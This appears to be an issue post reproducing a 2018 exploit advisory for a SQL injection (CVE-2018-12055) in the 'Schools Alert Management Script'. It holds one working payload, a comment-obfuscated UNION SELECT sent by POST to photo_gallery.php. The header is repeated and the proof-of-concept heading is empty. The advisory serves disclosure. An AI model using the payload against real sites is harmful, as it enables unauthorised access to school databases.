Open unh3x opened 6 years ago
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: xiaotian.wang From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12055
POST http://localhost/[PATH]/photo_gallery.php DATA xxx'/**/union/**/all/**/select/**/1,user(),3,4#
================= Schools Alert Management Script - SQL Injections
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: xiaotian.wang From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12055
================= Vulnerable cgi:
================= Proof of Concept: